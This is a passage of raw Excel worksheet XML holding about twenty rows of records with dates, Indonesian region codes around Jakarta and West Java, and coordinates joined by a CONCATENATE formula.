      </c>
      <c r="G3504" t="s">
        <v>11616</v>
      </c>
      <c r="H3504" t="s">
        <v>26</v>
      </c>
      <c r="I3504" t="s">
        <v>11617</v>
      </c>
      <c r="J3504" t="s">
        <v>2485</v>
      </c>
      <c r="L3504" t="s">
        <v>11618</v>
      </c>
      <c r="M3504">
        <v>3171080001</v>
      </c>
      <c r="N3504">
        <v>3171080</v>
      </c>
      <c r="O3504">
        <v>3171</v>
      </c>
      <c r="P3504">
        <v>31</v>
      </c>
      <c r="Q3504" t="s">
        <v>2265</v>
      </c>
      <c r="R3504" t="s">
        <v>1403</v>
      </c>
      <c r="S3504" t="s">
        <v>108</v>
      </c>
      <c r="T3504" t="s">
        <v>33</v>
      </c>
      <c r="U3504" s="5">
        <v>10682888</v>
      </c>
      <c r="V3504" s="5" t="s">
        <v>17610</v>
      </c>
      <c r="W3504" s="5">
        <v>-626602</v>
      </c>
      <c r="X3504" t="s">
        <v>21344</v>
      </c>
      <c r="Y3504" t="str">
        <f t="shared" si="54"/>
        <v>-6.26602,106.82888</v>
      </c>
    </row>
    <row r="3505" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3505">
        <v>265744</v>
      </c>
      <c r="B3505" s="1">
        <v>44247</v>
      </c>
      <c r="C3505" s="2">
        <v>0.67688657407407404</v>
      </c>
      <c r="D3505" t="s">
        <v>22</v>
      </c>
      <c r="E3505" t="s">
        <v>23</v>
      </c>
      <c r="F3505" t="s">
        <v>11619</v>
      </c>
      <c r="G3505" t="s">
        <v>11620</v>
      </c>
      <c r="H3505" t="s">
        <v>26</v>
      </c>
      <c r="I3505" t="s">
        <v>117</v>
      </c>
      <c r="J3505" t="s">
        <v>2622</v>
      </c>
      <c r="L3505" t="s">
        <v>11621</v>
      </c>
      <c r="M3505">
        <v>3506010010</v>
      </c>
      <c r="N3505">
        <v>3506010</v>
      </c>
      <c r="O3505">
        <v>3506</v>
      </c>
      <c r="P3505">
        <v>35</v>
      </c>
      <c r="Q3505" t="s">
        <v>11622</v>
      </c>
      <c r="R3505" t="s">
        <v>1544</v>
      </c>
      <c r="S3505" t="s">
        <v>8365</v>
      </c>
      <c r="T3505" t="s">
        <v>1221</v>
      </c>
      <c r="U3505" s="5">
        <v>11194840</v>
      </c>
      <c r="V3505" s="5" t="s">
        <v>17611</v>
      </c>
      <c r="W3505" s="5">
        <v>-789433</v>
      </c>
      <c r="X3505" t="s">
        <v>21345</v>
      </c>
      <c r="Y3505" t="str">
        <f t="shared" si="54"/>
        <v>-7.89433,111.94840</v>
      </c>
    </row>
    <row r="3506" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3506">
        <v>265745</v>
      </c>
      <c r="B3506" s="1">
        <v>44247</v>
      </c>
      <c r="C3506" s="2">
        <v>0.67682870370370374</v>
      </c>
      <c r="D3506" t="s">
        <v>22</v>
      </c>
      <c r="E3506" t="s">
        <v>23</v>
      </c>
      <c r="F3506" t="s">
        <v>11623</v>
      </c>
      <c r="G3506" t="s">
        <v>11624</v>
      </c>
      <c r="H3506" t="s">
        <v>26</v>
      </c>
      <c r="I3506" t="s">
        <v>517</v>
      </c>
      <c r="J3506" t="s">
        <v>3135</v>
      </c>
      <c r="L3506" t="s">
        <v>11625</v>
      </c>
      <c r="M3506">
        <v>3174070001</v>
      </c>
      <c r="N3506">
        <v>3174070</v>
      </c>
      <c r="O3506">
        <v>3174</v>
      </c>
      <c r="P3506">
        <v>31</v>
      </c>
      <c r="Q3506" t="s">
        <v>83</v>
      </c>
      <c r="R3506" t="s">
        <v>84</v>
      </c>
      <c r="S3506" t="s">
        <v>32</v>
      </c>
      <c r="T3506" t="s">
        <v>33</v>
      </c>
      <c r="U3506" s="5">
        <v>10671805</v>
      </c>
      <c r="V3506" s="5" t="s">
        <v>17612</v>
      </c>
      <c r="W3506" s="5">
        <v>-618447</v>
      </c>
      <c r="X3506" t="s">
        <v>21346</v>
      </c>
      <c r="Y3506" t="str">
        <f t="shared" si="54"/>
        <v>-6.18447,106.71805</v>
      </c>
    </row>
    <row r="3507" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3507">
        <v>265786</v>
      </c>
      <c r="B3507" s="1">
        <v>44247</v>
      </c>
      <c r="C3507" s="2">
        <v>0.67782407407407408</v>
      </c>
      <c r="D3507" t="s">
        <v>22</v>
      </c>
      <c r="E3507" t="s">
        <v>23</v>
      </c>
      <c r="F3507" t="s">
        <v>11626</v>
      </c>
      <c r="G3507" t="s">
        <v>11627</v>
      </c>
      <c r="H3507" t="s">
        <v>26</v>
      </c>
      <c r="I3507" t="s">
        <v>5188</v>
      </c>
      <c r="J3507" t="s">
        <v>3135</v>
      </c>
      <c r="L3507" t="s">
        <v>11628</v>
      </c>
      <c r="M3507">
        <v>3671012001</v>
      </c>
      <c r="N3507">
        <v>3671012</v>
      </c>
      <c r="O3507">
        <v>3671</v>
      </c>
      <c r="P3507">
        <v>36</v>
      </c>
      <c r="Q3507" t="s">
        <v>759</v>
      </c>
      <c r="R3507" t="s">
        <v>760</v>
      </c>
      <c r="S3507" t="s">
        <v>201</v>
      </c>
      <c r="T3507" t="s">
        <v>171</v>
      </c>
      <c r="U3507" s="5">
        <v>10669660</v>
      </c>
      <c r="V3507" s="5" t="s">
        <v>17613</v>
      </c>
      <c r="W3507" s="5">
        <v>-622227</v>
      </c>
      <c r="X3507" t="s">
        <v>21347</v>
      </c>
      <c r="Y3507" t="str">
        <f t="shared" si="54"/>
        <v>-6.22227,106.69660</v>
      </c>
    </row>
    <row r="3508" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3508">
        <v>265827</v>
      </c>
      <c r="B3508" s="1">
        <v>44247</v>
      </c>
      <c r="C3508" s="2">
        <v>0.67847222222222225</v>
      </c>
      <c r="D3508" t="s">
        <v>22</v>
      </c>
      <c r="E3508" t="s">
        <v>23</v>
      </c>
      <c r="F3508" t="s">
        <v>11629</v>
      </c>
      <c r="G3508" t="s">
        <v>11630</v>
      </c>
      <c r="H3508" t="s">
        <v>26</v>
      </c>
      <c r="I3508" t="s">
        <v>2005</v>
      </c>
      <c r="J3508" t="s">
        <v>232</v>
      </c>
      <c r="L3508" t="s">
        <v>11631</v>
      </c>
      <c r="M3508">
        <v>3174070001</v>
      </c>
      <c r="N3508">
        <v>3174070</v>
      </c>
      <c r="O3508">
        <v>3174</v>
      </c>
      <c r="P3508">
        <v>31</v>
      </c>
      <c r="Q3508" t="s">
        <v>83</v>
      </c>
      <c r="R3508" t="s">
        <v>84</v>
      </c>
      <c r="S3508" t="s">
        <v>32</v>
      </c>
      <c r="T3508" t="s">
        <v>33</v>
      </c>
      <c r="U3508" s="5">
        <v>10672127</v>
      </c>
      <c r="V3508" s="5" t="s">
        <v>15791</v>
      </c>
      <c r="W3508" s="5">
        <v>-615999</v>
      </c>
      <c r="X3508" t="s">
        <v>21348</v>
      </c>
      <c r="Y3508" t="str">
        <f t="shared" si="54"/>
        <v>-6.15999,106.72127</v>
      </c>
    </row>
    <row r="3509" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3509">
        <v>265868</v>
      </c>
      <c r="B3509" s="1">
        <v>44247</v>
      </c>
      <c r="C3509" s="2">
        <v>0.68432870370370369</v>
      </c>
      <c r="D3509" t="s">
        <v>22</v>
      </c>
      <c r="E3509" t="s">
        <v>23</v>
      </c>
      <c r="F3509" t="s">
        <v>11632</v>
      </c>
      <c r="G3509" t="s">
        <v>11633</v>
      </c>
      <c r="H3509" t="s">
        <v>26</v>
      </c>
      <c r="I3509" t="s">
        <v>1710</v>
      </c>
      <c r="J3509" t="s">
        <v>6061</v>
      </c>
      <c r="L3509" t="s">
        <v>11634</v>
      </c>
      <c r="M3509">
        <v>3173080003</v>
      </c>
      <c r="N3509">
        <v>3173080</v>
      </c>
      <c r="O3509">
        <v>3173</v>
      </c>
      <c r="P3509">
        <v>31</v>
      </c>
      <c r="Q3509" t="s">
        <v>157</v>
      </c>
      <c r="R3509" t="s">
        <v>157</v>
      </c>
      <c r="S3509" t="s">
        <v>62</v>
      </c>
      <c r="T3509" t="s">
        <v>33</v>
      </c>
      <c r="U3509" s="5">
        <v>10683108</v>
      </c>
      <c r="V3509" s="5" t="s">
        <v>17614</v>
      </c>
      <c r="W3509" s="5">
        <v>-617605</v>
      </c>
      <c r="X3509" t="s">
        <v>18379</v>
      </c>
      <c r="Y3509" t="str">
        <f t="shared" si="54"/>
        <v>-6.17605,106.83108</v>
      </c>
    </row>
    <row r="3510" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3510">
        <v>265915</v>
      </c>
      <c r="B3510" s="1">
        <v>44247</v>
      </c>
      <c r="C3510" s="2">
        <v>0.68680555555555556</v>
      </c>
      <c r="D3510" t="s">
        <v>2648</v>
      </c>
      <c r="E3510" t="s">
        <v>23</v>
      </c>
      <c r="G3510" t="s">
        <v>11635</v>
      </c>
      <c r="H3510" t="s">
        <v>26</v>
      </c>
      <c r="I3510" t="s">
        <v>608</v>
      </c>
      <c r="J3510" t="s">
        <v>4269</v>
      </c>
      <c r="L3510" t="s">
        <v>11636</v>
      </c>
      <c r="M3510">
        <v>3173060008</v>
      </c>
      <c r="N3510">
        <v>3173060</v>
      </c>
      <c r="O3510">
        <v>3173</v>
      </c>
      <c r="P3510">
        <v>31</v>
      </c>
      <c r="Q3510" t="s">
        <v>329</v>
      </c>
      <c r="R3510" t="s">
        <v>61</v>
      </c>
      <c r="S3510" t="s">
        <v>62</v>
      </c>
      <c r="T3510" t="s">
        <v>33</v>
      </c>
      <c r="U3510" s="5">
        <v>10684010</v>
      </c>
      <c r="V3510" s="5" t="s">
        <v>16028</v>
      </c>
      <c r="W3510" s="5">
        <v>-615958</v>
      </c>
      <c r="X3510" t="s">
        <v>21349</v>
      </c>
      <c r="Y3510" t="str">
        <f t="shared" si="54"/>
        <v>-6.15958,106.84010</v>
      </c>
    </row>
    <row r="3511" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3511">
        <v>265950</v>
      </c>
      <c r="B3511" s="1">
        <v>44247</v>
      </c>
      <c r="C3511" s="2">
        <v>0.68905092592592598</v>
      </c>
      <c r="D3511" t="s">
        <v>22</v>
      </c>
      <c r="E3511" t="s">
        <v>23</v>
      </c>
      <c r="F3511" t="s">
        <v>11637</v>
      </c>
      <c r="G3511" t="s">
        <v>11638</v>
      </c>
      <c r="H3511" t="s">
        <v>26</v>
      </c>
      <c r="I3511" t="s">
        <v>80</v>
      </c>
      <c r="J3511" t="s">
        <v>10590</v>
      </c>
      <c r="L3511" t="s">
        <v>11639</v>
      </c>
      <c r="M3511">
        <v>3171100001</v>
      </c>
      <c r="N3511">
        <v>3171100</v>
      </c>
      <c r="O3511">
        <v>3171</v>
      </c>
      <c r="P3511">
        <v>31</v>
      </c>
      <c r="Q3511" t="s">
        <v>1474</v>
      </c>
      <c r="R3511" t="s">
        <v>107</v>
      </c>
      <c r="S3511" t="s">
        <v>108</v>
      </c>
      <c r="T3511" t="s">
        <v>33</v>
      </c>
      <c r="U3511" s="5">
        <v>10681895</v>
      </c>
      <c r="V3511" s="5" t="s">
        <v>15001</v>
      </c>
      <c r="W3511" s="5">
        <v>-622425</v>
      </c>
      <c r="X3511" t="s">
        <v>21350</v>
      </c>
      <c r="Y3511" t="str">
        <f t="shared" si="54"/>
        <v>-6.22425,106.81895</v>
      </c>
    </row>
    <row r="3512" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3512">
        <v>265961</v>
      </c>
      <c r="B3512" s="1">
        <v>44247</v>
      </c>
      <c r="C3512" s="2">
        <v>0.69027777777777777</v>
      </c>
      <c r="D3512" t="s">
        <v>2648</v>
      </c>
      <c r="E3512" t="s">
        <v>23</v>
      </c>
      <c r="G3512" t="s">
        <v>11640</v>
      </c>
      <c r="H3512" t="s">
        <v>26</v>
      </c>
      <c r="J3512" t="s">
        <v>7871</v>
      </c>
      <c r="L3512" t="s">
        <v>11641</v>
      </c>
      <c r="M3512">
        <v>3174070001</v>
      </c>
      <c r="N3512">
        <v>3174070</v>
      </c>
      <c r="O3512">
        <v>3174</v>
      </c>
      <c r="P3512">
        <v>31</v>
      </c>
      <c r="Q3512" t="s">
        <v>83</v>
      </c>
      <c r="R3512" t="s">
        <v>84</v>
      </c>
      <c r="S3512" t="s">
        <v>32</v>
      </c>
      <c r="T3512" t="s">
        <v>33</v>
      </c>
      <c r="U3512" s="5">
        <v>10671410</v>
      </c>
      <c r="V3512" s="5" t="s">
        <v>17615</v>
      </c>
      <c r="W3512" s="5">
        <v>-617991</v>
      </c>
      <c r="X3512" t="s">
        <v>21351</v>
      </c>
      <c r="Y3512" t="str">
        <f t="shared" si="54"/>
        <v>-6.17991,106.71410</v>
      </c>
    </row>
    <row r="3513" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3513">
        <v>266035</v>
      </c>
      <c r="B3513" s="1">
        <v>44247</v>
      </c>
      <c r="C3513" s="2">
        <v>0.69709490740740743</v>
      </c>
      <c r="D3513" t="s">
        <v>22</v>
      </c>
      <c r="E3513" t="s">
        <v>23</v>
      </c>
      <c r="F3513" t="s">
        <v>11642</v>
      </c>
      <c r="G3513" t="s">
        <v>11643</v>
      </c>
      <c r="H3513" t="s">
        <v>26</v>
      </c>
      <c r="I3513" t="s">
        <v>3481</v>
      </c>
      <c r="J3513" t="s">
        <v>2627</v>
      </c>
      <c r="M3513">
        <v>3275050001</v>
      </c>
      <c r="N3513">
        <v>3275050</v>
      </c>
      <c r="O3513">
        <v>3275</v>
      </c>
      <c r="P3513">
        <v>32</v>
      </c>
      <c r="Q3513" t="s">
        <v>4376</v>
      </c>
      <c r="R3513" t="s">
        <v>955</v>
      </c>
      <c r="S3513" t="s">
        <v>41</v>
      </c>
      <c r="T3513" t="s">
        <v>42</v>
      </c>
      <c r="U3513" s="5">
        <v>10696588</v>
      </c>
      <c r="V3513" s="5" t="s">
        <v>17616</v>
      </c>
      <c r="W3513" s="5">
        <v>-627340</v>
      </c>
      <c r="X3513" t="s">
        <v>21352</v>
      </c>
      <c r="Y3513" t="str">
        <f t="shared" si="54"/>
        <v>-6.27340,106.96588</v>
      </c>
    </row>
    <row r="3514" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3514">
        <v>266079</v>
      </c>
      <c r="B3514" s="1">
        <v>44247</v>
      </c>
      <c r="C3514" s="2">
        <v>0.70150462962962967</v>
      </c>
      <c r="D3514" t="s">
        <v>22</v>
      </c>
      <c r="E3514" t="s">
        <v>23</v>
      </c>
      <c r="F3514" t="s">
        <v>11644</v>
      </c>
      <c r="G3514" t="s">
        <v>11645</v>
      </c>
      <c r="H3514" t="s">
        <v>26</v>
      </c>
      <c r="I3514" t="s">
        <v>11646</v>
      </c>
      <c r="J3514" t="s">
        <v>1656</v>
      </c>
      <c r="M3514">
        <v>3173080003</v>
      </c>
      <c r="N3514">
        <v>3173080</v>
      </c>
      <c r="O3514">
        <v>3173</v>
      </c>
      <c r="P3514">
        <v>31</v>
      </c>
      <c r="Q3514" t="s">
        <v>157</v>
      </c>
      <c r="R3514" t="s">
        <v>157</v>
      </c>
      <c r="S3514" t="s">
        <v>62</v>
      </c>
      <c r="T3514" t="s">
        <v>33</v>
      </c>
      <c r="U3514" s="5">
        <v>10682717</v>
      </c>
      <c r="V3514" s="5" t="s">
        <v>14477</v>
      </c>
      <c r="W3514" s="5">
        <v>-617583</v>
      </c>
      <c r="X3514" t="s">
        <v>21353</v>
      </c>
      <c r="Y3514" t="str">
        <f t="shared" si="54"/>
        <v>-6.17583,106.82717</v>
      </c>
    </row>
    <row r="3515" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3515">
        <v>266122</v>
      </c>
      <c r="B3515" s="1">
        <v>44247</v>
      </c>
      <c r="C3515" s="2">
        <v>0.70502314814814815</v>
      </c>
      <c r="D3515" t="s">
        <v>22</v>
      </c>
      <c r="E3515" t="s">
        <v>23</v>
      </c>
      <c r="F3515" t="s">
        <v>11647</v>
      </c>
      <c r="G3515" t="s">
        <v>11648</v>
      </c>
      <c r="H3515" t="s">
        <v>26</v>
      </c>
      <c r="I3515" t="s">
        <v>784</v>
      </c>
      <c r="J3515" t="s">
        <v>3135</v>
      </c>
      <c r="L3515" t="s">
        <v>11649</v>
      </c>
      <c r="M3515">
        <v>3671042004</v>
      </c>
      <c r="N3515">
        <v>3671042</v>
      </c>
      <c r="O3515">
        <v>3671</v>
      </c>
      <c r="P3515">
        <v>36</v>
      </c>
      <c r="Q3515" t="s">
        <v>2102</v>
      </c>
      <c r="R3515" t="s">
        <v>2102</v>
      </c>
      <c r="S3515" t="s">
        <v>201</v>
      </c>
      <c r="T3515" t="s">
        <v>171</v>
      </c>
      <c r="U3515" s="5">
        <v>10659642</v>
      </c>
      <c r="V3515" s="5" t="s">
        <v>17617</v>
      </c>
      <c r="W3515" s="5">
        <v>-616722</v>
      </c>
      <c r="X3515" t="s">
        <v>21354</v>
      </c>
      <c r="Y3515" t="str">
        <f t="shared" si="54"/>
        <v>-6.16722,106.59642</v>
      </c>
    </row>
    <row r="3516" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3516">
        <v>266427</v>
      </c>
      <c r="B3516" s="1">
        <v>44247</v>
      </c>
      <c r="C3516" s="2">
        <v>0.72833333333333339</v>
      </c>
      <c r="D3516" t="s">
        <v>22</v>
      </c>
      <c r="E3516" t="s">
        <v>23</v>
      </c>
      <c r="F3516" s="3" t="s">
        <v>11650</v>
      </c>
      <c r="H3516" t="s">
        <v>26</v>
      </c>
      <c r="I3516" t="s">
        <v>11651</v>
      </c>
      <c r="J3516" t="s">
        <v>10660</v>
      </c>
      <c r="L3516" t="s">
        <v>11652</v>
      </c>
      <c r="M3516">
        <v>3174020004</v>
      </c>
      <c r="N3516">
        <v>3174020</v>
      </c>
      <c r="O3516">
        <v>3174</v>
      </c>
      <c r="P3516">
        <v>31</v>
      </c>
      <c r="Q3516" t="s">
        <v>31</v>
      </c>
      <c r="R3516" t="s">
        <v>31</v>
      </c>
      <c r="S3516" t="s">
        <v>32</v>
      </c>
      <c r="T3516" t="s">
        <v>33</v>
      </c>
      <c r="U3516" s="5">
        <v>10676094</v>
      </c>
      <c r="V3516" s="5" t="s">
        <v>17618</v>
      </c>
      <c r="W3516" s="5">
        <v>-619337</v>
      </c>
      <c r="X3516" t="s">
        <v>21355</v>
      </c>
      <c r="Y3516" t="str">
        <f t="shared" si="54"/>
        <v>-6.19337,106.76094</v>
      </c>
    </row>
    <row r="3517" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3517">
        <v>266512</v>
      </c>
      <c r="B3517" s="1">
        <v>44247</v>
      </c>
      <c r="C3517" s="2">
        <v>0.73438657407407415</v>
      </c>
      <c r="D3517" t="s">
        <v>22</v>
      </c>
      <c r="E3517" t="s">
        <v>23</v>
      </c>
      <c r="F3517" t="s">
        <v>11653</v>
      </c>
      <c r="G3517" t="s">
        <v>11654</v>
      </c>
      <c r="H3517" t="s">
        <v>26</v>
      </c>
      <c r="I3517" t="s">
        <v>284</v>
      </c>
      <c r="J3517" t="s">
        <v>11655</v>
      </c>
      <c r="M3517">
        <v>3171060009</v>
      </c>
      <c r="N3517">
        <v>3171060</v>
      </c>
      <c r="O3517">
        <v>3171</v>
      </c>
      <c r="P3517">
        <v>31</v>
      </c>
      <c r="Q3517" t="s">
        <v>11179</v>
      </c>
      <c r="R3517" t="s">
        <v>1236</v>
      </c>
      <c r="S3517" t="s">
        <v>108</v>
      </c>
      <c r="T3517" t="s">
        <v>33</v>
      </c>
      <c r="U3517" s="5">
        <v>10681628</v>
      </c>
      <c r="V3517" s="5" t="s">
        <v>17619</v>
      </c>
      <c r="W3517" s="5">
        <v>-623713</v>
      </c>
      <c r="X3517" t="s">
        <v>21299</v>
      </c>
      <c r="Y3517" t="str">
        <f t="shared" si="54"/>
        <v>-6.23713,106.81628</v>
      </c>
    </row>
    <row r="3518" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3518">
        <v>266681</v>
      </c>
      <c r="B3518" s="1">
        <v>44247</v>
      </c>
      <c r="C3518" s="2">
        <v>0.74959490740740742</v>
      </c>
      <c r="D3518" t="s">
        <v>22</v>
      </c>
      <c r="E3518" t="s">
        <v>23</v>
      </c>
      <c r="F3518" t="s">
        <v>11656</v>
      </c>
      <c r="G3518" t="s">
        <v>11657</v>
      </c>
      <c r="H3518" t="s">
        <v>26</v>
      </c>
      <c r="I3518" t="s">
        <v>166</v>
      </c>
      <c r="J3518" t="s">
        <v>2627</v>
      </c>
      <c r="L3518" t="s">
        <v>11658</v>
      </c>
      <c r="M3518">
        <v>3216090004</v>
      </c>
      <c r="N3518">
        <v>3216090</v>
      </c>
      <c r="O3518">
        <v>3216</v>
      </c>
      <c r="P3518">
        <v>32</v>
      </c>
      <c r="Q3518" t="s">
        <v>11659</v>
      </c>
      <c r="R3518" t="s">
        <v>335</v>
      </c>
      <c r="S3518" t="s">
        <v>41</v>
      </c>
      <c r="T3518" t="s">
        <v>42</v>
      </c>
      <c r="U3518" s="5">
        <v>10704433</v>
      </c>
      <c r="V3518" s="5" t="s">
        <v>17620</v>
      </c>
      <c r="W3518" s="5">
        <v>-614213</v>
      </c>
      <c r="X3518" t="s">
        <v>21356</v>
      </c>
      <c r="Y3518" t="str">
        <f t="shared" si="54"/>
        <v>-6.14213,107.04433</v>
      </c>
    </row>
    <row r="3519" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3519">
        <v>267060</v>
      </c>
      <c r="B3519" s="1">
        <v>44247</v>
      </c>
      <c r="C3519" s="2">
        <v>0.78070601851851851</v>
      </c>
      <c r="D3519" t="s">
        <v>22</v>
      </c>
      <c r="E3519" t="s">
        <v>23</v>
      </c>
      <c r="F3519" t="s">
        <v>11660</v>
      </c>
      <c r="G3519" t="s">
        <v>11661</v>
      </c>
      <c r="H3519" t="s">
        <v>26</v>
      </c>
      <c r="I3519" t="s">
        <v>3603</v>
      </c>
      <c r="J3519" t="s">
        <v>846</v>
      </c>
      <c r="M3519">
        <v>3174070002</v>
      </c>
      <c r="N3519">
        <v>3174070</v>
      </c>
      <c r="O3519">
        <v>3174</v>
      </c>
      <c r="P3519">
        <v>31</v>
      </c>
      <c r="Q3519" t="s">
        <v>621</v>
      </c>
      <c r="R3519" t="s">
        <v>84</v>
      </c>
      <c r="S3519" t="s">
        <v>32</v>
      </c>
      <c r="T3519" t="s">
        <v>33</v>
      </c>
      <c r="U3519" s="5">
        <v>10673826</v>
      </c>
      <c r="V3519" s="5" t="s">
        <v>17621</v>
      </c>
      <c r="W3519" s="5">
        <v>-616837</v>
      </c>
      <c r="X3519" t="s">
        <v>21357</v>
      </c>
      <c r="Y3519" t="str">
        <f t="shared" si="54"/>
        <v>-6.16837,106.73826</v>
      </c>
    </row>
    <row r="3520" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3520">
        <v>267901</v>
      </c>
      <c r="B3520" s="1">
        <v>44247</v>
      </c>
      <c r="C3520" s="2">
        <v>0.85001157407407402</v>
      </c>
      <c r="D3520" t="s">
        <v>22</v>
      </c>
      <c r="E3520" t="s">
        <v>23</v>
      </c>
      <c r="F3520" t="s">
        <v>11662</v>
      </c>
      <c r="H3520" t="s">
        <v>26</v>
      </c>
      <c r="I3520" t="s">
        <v>11663</v>
      </c>
      <c r="J3520" t="s">
        <v>11664</v>
      </c>
      <c r="L3520" t="s">
        <v>250</v>
      </c>
      <c r="M3520">
        <v>3174070001</v>
      </c>
      <c r="N3520">
        <v>3174070</v>
      </c>
      <c r="O3520">
        <v>3174</v>
      </c>
      <c r="P3520">
        <v>31</v>
      </c>
      <c r="Q3520" t="s">
        <v>83</v>
      </c>
      <c r="R3520" t="s">
        <v>84</v>
      </c>
      <c r="S3520" t="s">
        <v>32</v>
      </c>
      <c r="T3520" t="s">
        <v>33</v>
      </c>
      <c r="U3520" s="5">
        <v>10671402</v>
      </c>
      <c r="V3520" s="5" t="s">
        <v>17622</v>
      </c>
      <c r="W3520" s="5">
        <v>-617545</v>
      </c>
      <c r="X3520" t="s">
        <v>21358</v>
      </c>
      <c r="Y3520" t="str">
        <f t="shared" si="54"/>
        <v>-6.17545,106.71402</v>
      </c>
    </row>
    <row r="3521" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3521">
        <v>268684</v>
      </c>
      <c r="B3521" s="1">
        <v>44247</v>
      </c>
      <c r="C3521" s="2">
        <v>0.91494212962962962</v>
      </c>
      <c r="D3521" t="s">
        <v>22</v>
      </c>
      <c r="E3521" t="s">
        <v>23</v>
      </c>
      <c r="F3521" t="s">
        <v>11665</v>
      </c>
      <c r="G3521" t="s">
        <v>11666</v>
      </c>
      <c r="H3521" t="s">
        <v>26</v>
      </c>
      <c r="I3521" t="s">
        <v>523</v>
      </c>
      <c r="J3521" t="s">
        <v>2627</v>
      </c>
      <c r="L3521" t="s">
        <v>11667</v>
      </c>
      <c r="M3521">
        <v>3215113005</v>
      </c>
      <c r="N3521">
        <v>3215113</v>
      </c>
      <c r="O3521">
        <v>3215</v>
      </c>
      <c r="P3521">
        <v>32</v>
      </c>
      <c r="Q3521" t="s">
        <v>9968</v>
      </c>
      <c r="R3521" t="s">
        <v>9969</v>
      </c>
      <c r="S3521" t="s">
        <v>3979</v>
      </c>
      <c r="T3521" t="s">
        <v>42</v>
      </c>
      <c r="U3521" s="5">
        <v>10727500</v>
      </c>
      <c r="V3521" s="5" t="s">
        <v>17623</v>
      </c>
      <c r="W3521" s="5">
        <v>-627148</v>
      </c>
      <c r="X3521" t="s">
        <v>21359</v>
      </c>
      <c r="Y3521" t="str">
        <f t="shared" si="54"/>
        <v>-6.27148,107.27500</v>
      </c>
    </row>
    <row r="3522" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3522">
        <v>269026</v>
      </c>
      <c r="B3522" s="1">
        <v>44247</v>
      </c>
      <c r="C3522" s="2">
        <v>0.94592592592592595</v>
      </c>
      <c r="D3522" t="s">
        <v>22</v>
      </c>
      <c r="E3522" t="s">
        <v>23</v>
      </c>
      <c r="F3522" t="s">
        <v>11668</v>
      </c>
      <c r="G3522" t="s">
        <v>11669</v>
      </c>
      <c r="H3522" t="s">
        <v>26</v>
      </c>
      <c r="I3522" t="s">
        <v>8605</v>
      </c>
      <c r="J3522" t="s">
        <v>3135</v>
      </c>
      <c r="L3522" t="s">
        <v>11670</v>
      </c>
      <c r="M3522">
        <v>3671042004</v>
      </c>
      <c r="N3522">
        <v>3671042</v>
      </c>
      <c r="O3522">
        <v>3671</v>
      </c>
      <c r="P3522">
        <v>36</v>
      </c>
      <c r="Q3522" t="s">
        <v>2102</v>
      </c>
      <c r="R3522" t="s">
        <v>2102</v>
      </c>
      <c r="S3522" t="s">
        <v>201</v>
      </c>
      <c r="T3522" t="s">
        <v>171</v>
      </c>
      <c r="U3522" s="5">
        <v>10659593</v>
      </c>
      <c r="V3522" s="5" t="s">
        <v>17624</v>
      </c>
      <c r="W3522" s="5">
        <v>-616963</v>
      </c>
      <c r="X3522" t="s">
        <v>21360</v>
      </c>
      <c r="Y3522" t="str">
        <f t="shared" si="54"/>
        <v>-6.16963,106.59593</v>
      </c>
    </row>
    <row r="3523" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3523">
        <v>269273</v>
      </c>
      <c r="B3523" s="1">
        <v>44247</v>
      </c>
      <c r="C3523" s="2">
        <v>0.96570601851851856</v>
      </c>
      <c r="D3523" t="s">
        <v>22</v>
      </c>
      <c r="E3523" t="s">
        <v>23</v>
      </c>
      <c r="F3523" t="s">
        <v>11671</v>
      </c>
      <c r="G3523" t="s">
        <v>11672</v>
      </c>
      <c r="H3523" t="s">
        <v>26</v>
      </c>
      <c r="I3523" t="s">
        <v>893</v>
      </c>
      <c r="J3523" t="s">
        <v>2627</v>
      </c>
      <c r="L3523" t="s">
        <v>11673</v>
      </c>
      <c r="M3523">
        <v>3216021007</v>
      </c>
      <c r="N3523">
        <v>3216021</v>
      </c>
      <c r="O3523">
        <v>3216</v>
      </c>
      <c r="P3523">
        <v>32</v>
      </c>
      <c r="Q3523" t="s">
        <v>7032</v>
      </c>
      <c r="R3523" t="s">
        <v>10721</v>
      </c>
      <c r="S3523" t="s">
        <v>41</v>
      </c>
      <c r="T3523" t="s">
        <v>42</v>
      </c>
      <c r="U3523" s="5">
        <v>10710029</v>
      </c>
      <c r="V3523" s="5" t="s">
        <v>17625</v>
      </c>
      <c r="W3523" s="5">
        <v>-637710</v>
      </c>
      <c r="X3523" t="s">
        <v>21361</v>
      </c>
      <c r="Y3523" t="str">
        <f t="shared" ref="Y3523:Y3586" si="55">CONCATENATE(X3523,",",V3523)</f>
        <v>-6.37710,107.10029</v>
      </c>
    </row>
    <row r="3524" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3524">
        <v>269315</v>
      </c>
      <c r="B3524" s="1">
        <v>44247</v>
      </c>
      <c r="C3524" s="2">
        <v>0.96928240740740745</v>
      </c>
      <c r="D3524" t="s">
        <v>22</v>
      </c>
      <c r="E3524" t="s">
        <v>23</v>
      </c>
      <c r="F3524" t="s">
        <v>11674</v>
      </c>
      <c r="G3524" t="s">
        <v>11675</v>
      </c>
      <c r="H3524" t="s">
        <v>26</v>
      </c>
      <c r="I3524" t="s">
        <v>1394</v>
      </c>
      <c r="J3524" t="s">
        <v>2627</v>
      </c>
      <c r="L3524" t="s">
        <v>11676</v>
      </c>
      <c r="M3524">
        <v>3275031001</v>
      </c>
      <c r="N3524">
        <v>3275031</v>
      </c>
      <c r="O3524">
        <v>3275</v>
      </c>
      <c r="P3524">
        <v>32</v>
      </c>
      <c r="Q3524" t="s">
        <v>10622</v>
      </c>
      <c r="R3524" t="s">
        <v>574</v>
      </c>
      <c r="S3524" t="s">
        <v>41</v>
